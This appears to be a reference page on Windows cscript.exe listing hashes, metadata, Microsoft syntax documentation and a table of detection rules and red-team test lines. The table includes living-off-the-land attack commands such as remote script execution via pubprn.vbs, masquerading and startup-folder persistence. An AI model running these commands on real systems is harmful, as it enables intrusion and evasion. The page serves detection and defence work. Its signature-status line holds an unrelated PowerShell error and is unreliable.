cscript.exe
- File Path:
C:\windows\SysWOW64\cscript.exe - Description: Microsoft Console Based Script Host
Hashes
| Type | Hash |
|---|---|
| MD5 | 1A9BA93EBE4CB60030831F8CE9E7D5F9 |
| SHA1 | AC373ED32B491DA22924E2E11E36574E5D582A35 |
| SHA256 | 7824C45FC033696603FE97D8F193A1872DFB2B5DB75F0CDA21DF27017B3CB623 |
| SHA384 | 5F4CB7FD2170BAC400403CAA8463A2607E7E6D3FCFC267E1C79C75ED707C02814720C4FC472D90DABE7374DC62D9B137 |
| SHA512 | AB3DECCED8B1EFA2205C35A2E9A4024FDE01AA2255892075F08F3728C6D46CD5C4257334852DC0DC8C61674536CF1E975B38AF0CB29A9CFD8E544F03DF80B9C1 |
| SSDEEP | 3072:A7dDUkWCakBk2uE12mSZ1MOJdpsQz7EETxtN:A5DV9SZ1MWzpTR |
Signature
- Status: The file C:\windows\SysWOW64\cscript.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
- Serial: ``
- Thumbprint: ``
- Issuer:
- Subject:
File Metadata
- Original Filename: cscript.exe.mui
- Product Name: Microsoft Windows Script Host
- Company Name: Microsoft Corporation
- File Version: 5.8.9600.16384
- Product Version: 5.8.9600.16384
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
Possible Misuse
The following table contains possible examples of cscript.exe being misused. While cscript.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
| Source | Source File | Example | License |
|---|---|---|---|
| sigma | godmode_sigma_rule.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | godmode_sigma_rule.yml | - 'cscript' |
DRL 1.0 |
| sigma | sysmon_cactustorch.yml | - '\System32\cscript.exe' |
DRL 1.0 |
| sigma | file_event_win_susp_clr_logs.yml | - 'cscript' |
DRL 1.0 |
| sigma | file_event_win_winrm_awl_bypass.yml | description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) |
DRL 1.0 |
| sigma | file_event_win_win_cscript_wscript_dropper.yml | title: WScript or CScript Dropper |
DRL 1.0 |
| sigma | file_event_win_win_cscript_wscript_dropper.yml | description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe |
DRL 1.0 |
| sigma | file_event_win_win_cscript_wscript_dropper.yml | - WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846) |
DRL 1.0 |
| sigma | file_event_win_win_cscript_wscript_dropper.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | file_event_win_win_shell_write_susp_directory.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | image_load_suspicious_dbghelp_dbgcore_load.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | image_load_susp_script_dotnet_clr_dll_load.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_apt_cloudhopper.yml | description: Detects suspicious file execution by wscript and cscript |
DRL 1.0 |
| sigma | proc_creation_win_apt_cloudhopper.yml | Image\|endswith: '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_html_help_spawn.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_lolbin_cscript_gathernetworkinfo.yml | description: Adversaries can abuse of C:\Windows\System32\gatherNetworkInfo.vbs script along with cscript.exe to gather information about the target |
DRL 1.0 |
| sigma | proc_creation_win_lolbin_cscript_gathernetworkinfo.yml | - 'cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_malware_script_dropper.yml | title: WScript or CScript Dropper |
DRL 1.0 |
| sigma | proc_creation_win_malware_script_dropper.yml | description: Detects wscript/cscript executions of scripts located in user directories |
DRL 1.0 |
| sigma | proc_creation_win_malware_script_dropper.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_mal_adwind.yml | - 'cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_manage_bde_lolbas.yml | - 'cscript' |
DRL 1.0 |
| sigma | proc_creation_win_mmc_spawn_shell.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_mshta_spawn_shell.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_multiple_suspicious_cli.yml | - cscript.exe |
DRL 1.0 |
| sigma | proc_creation_win_office_shell.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_outlook_shell.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_public_folder_parent.yml | - 'cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary.yml | - 'cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary_highly_relevant.yml | - 'cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary_highly_relevant.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_script_event_consumer_spawn.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_shell_spawn_susp_program.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_csc.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_cscript_vbs.yml | title: Cscript Visual Basic Script Execution |
DRL 1.0 |
| sigma | proc_creation_win_susp_cscript_vbs.yml | Image\|endswith: \cscript.exe |
DRL 1.0 |
| sigma | proc_creation_win_susp_powershell_parent_combo.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_registration_via_cscript.yml | title: Suspicious Registration via cscript.exe |
DRL 1.0 |
| sigma | proc_creation_win_susp_registration_via_cscript.yml | - https://ss64.com/vb/cscript.html |
DRL 1.0 |
| sigma | proc_creation_win_susp_registration_via_cscript.yml | Image\|endswith: '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_script_execution.yml | description: Detects suspicious file execution by wscript and cscript |
DRL 1.0 |
| sigma | proc_creation_win_susp_script_execution.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_script_exec_from_env_folder.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_script_exec_from_env_folder.yml | - 'cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_script_exec_from_temp.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_servu_process_pattern.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_shell_spawn_by_java.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_shell_spawn_by_java_keytool.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_system_user_anomaly.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_winrm_awl_bypass.yml | description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) |
DRL 1.0 |
| sigma | proc_creation_win_susp_winrm_execution.yml | Image\|endswith: '\cscript.exe' |
DRL 1.0 |
| sigma | proc_creation_win_task_folder_evasion.yml | description: The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr |
DRL 1.0 |
| sigma | proc_creation_win_vmtoolsd_susp_child_process.yml | - '\cscript.exe' |
DRL 1.0 |
| sigma | registry_event_susp_run_key_img_folder.yml | - 'cscript' |
DRL 1.0 |
| LOLBAS | Testxlst.yml | - Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out |
|
| LOLBAS | Cscript.yml | Name: Cscript.exe |
|
| LOLBAS | Cscript.yml | - Command: cscript c:\ads\file.txt:script.vbs |
|
| LOLBAS | Cscript.yml | Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). |
|
| LOLBAS | Cscript.yml | - Path: C:\Windows\System32\cscript.exe |
|
| LOLBAS | Cscript.yml | - Path: C:\Windows\SysWOW64\cscript.exe |
|
| LOLBAS | Cscript.yml | - IOC: Cscript.exe executing files from alternate data streams |
|
| LOLBAS | Cscript.yml | - IOC: DotNet CLR libraries loaded into cscript.exe |
|
| LOLBAS | Cscript.yml | - IOC: DotNet CLR Usage Log - cscript.exe.log |
|
| LOLBAS | Manage-bde.yml | - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf |
|
| LOLBAS | Manage-bde.yml | - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf |
|
| LOLBAS | Winrm.yml | - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty' |
|
| LOLBAS | Winrm.yml | Description: Bypass AWL solutions by copying and executing cscript.exe and malicious XSL documents from attacker controlled location |
|
| atomic-red-team | index.md | - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | - Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | ## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.005.md | cscript #{vbscript} > $env:TEMP\T1059.005.out.txt | MIT License. © 2018 Red Canary |
| atomic-red-team | T1082.md | cscript #{vbscript} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1105.md | CScript.exe AtomicTestT1105.js //E:JScript | MIT License. © 2018 Red Canary |
| atomic-red-team | T1204.002.md | This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1204.002.md | $macrocode = “ Open "#{jse_path}” For Output As #1n Write #1, “WScript.Quit"n Close #1n Shell$ "cscript.exe #{jse_path}“`n” |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1204.002.md | Uses cscript //E:jscript to download a file | MIT License. © 2018 Red Canary |
| atomic-red-team | T1204.002.md | cscript //E:Jscript #{script_file} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1216.md | cscript %windir%\System32\manage-bde.wsf | MIT License. © 2018 Red Canary |
| atomic-red-team | T1216.001.md | PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png.</blockquote> |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1216.001.md | cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost “script:#{remote_payload}” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.001.md | cscript.exe “$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.001.md | cscript.exe “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.001.md | cscript.exe /E:Jscript “$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.001.md | cscript.exe /E:Jscript “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse” | MIT License. © 2018 Red Canary |
| signature-base | apt_monsoon.yar | $x3 = “ cscript.[BACKSPA[PAGE DO[CAPS LO[PAGE UPTPX498.dTPX499.d” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_oilrig.yar | $x2 = “cscript.exe //T:20 //Nologo “ fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_oilrig.yar | $a1 = “taskkill /F /IM cscript.exe” fullword ascii | CC BY-NC 4.0 |
| signature-base | cn_pentestset_scripts.yar | $s1 = “/c "C:\windows\temp\cscript" C:\windows\temp\iis.vbs” fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | crime_wannacry.yar | $s2 = “cscript.exe //nologo m.vbs” fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_url_persitence.yar | $file1 = /\x0a\x0d\s=[^\x0d](powershell|cmd|certutil|mshta|wscript|cscript|rundll32|wmic|regsvr32|msbuild)(.exe|)[^\x0d]{2,50}\x0d/ nocase | CC BY-NC 4.0 |
Additional Info*
*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.
cscript
Applies to: Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012
Starts a script to run in a command-line environment.
[!IMPORTANT] Performing this task does not require you to have administrative credentials. Therefore, as a security best practice, consider performing this task as a user without administrative credentials.
Syntax
cscript <scriptname.extension> [/b] [/d] [/e:<engine>] [{/h:cscript | /h:wscript}] [/i] [/job:<identifier>] [{/logo | /nologo}] [/s] [/t:<seconds>] [x] [/u] [/?] [<scriptarguments>]
Parameters
| Parameter | Description |
|---|---|
| scriptname.extension | Specifies the path and file name of the script file with optional file name extension. |
| /b | Specifies batch mode, which does not display alerts, scripting errors, or input prompts. |
| /d | Starts the debugger. |
/e:<engine> |
Specifies the engine that is used to run the script. |
| /h:cscript | Registers cscript.exe as the default script host for running scripts. |
| /h:wscript | Registers wscript.exe as the default script host for running scripts. The default. |
| /i | Specifies interactive mode, which displays alerts, scripting errors, and input prompts. The default, and the opposite of /b. |
/job:<identifier> |
Runs the job identified by identifier in a .wsf script file. |
| /logo | Specifies that the Windows Script Host banner is displayed in the console before the script runs. The default, and the opposite of /nologo. |
| /nologo | Specifies that the Windows Script Host banner is not displayed before the script runs. |
| /s | Saves the current command-prompt options for the current user. |
/t:<seconds> |
Specifies the maximum time the script can run (in seconds). You can specify up to 32,767 seconds. The default is no time limit. |
| /u | Specifies Unicode for input and output that is redirected from the console. |
| /x | Starts the script in the debugger. |
| /? | Displays available command parameters and provides help for using them. The same as typing cscript.exe with no parameters and no script. |
| scriptarguments | Specifies the arguments passed to the script. Each script argument must be preceded by a slash (/). |
Remarks
-
Each parameter is optional; however, you can’t specify script arguments without specifying a script. If you don’t specify a script or any script arguments, cscript.exe displays the cscript.exe syntax and the valid host options.
-
The /t parameter prevents excessive running of scripts by setting a timer. When the run time exceeds the specified value, cscript interrupts the script engine and ends the process.
-
Windows script files usually have one of the following file name extensions: .wsf, .vbs, .js. Windows Script Host can use .wsf script files. Each .wsf file can use multiple scripting engines and perform multiple jobs.
-
if you double-click a script file with an extension that has no association, the Open With dialog box appears. Select wscript or cscript, and then select Always use this program to open this file type. This registers wscript.exe or cscript as the default script host for files of this file type.
Additional References
MIT License. Copyright (c) 2020-2021 Strontic.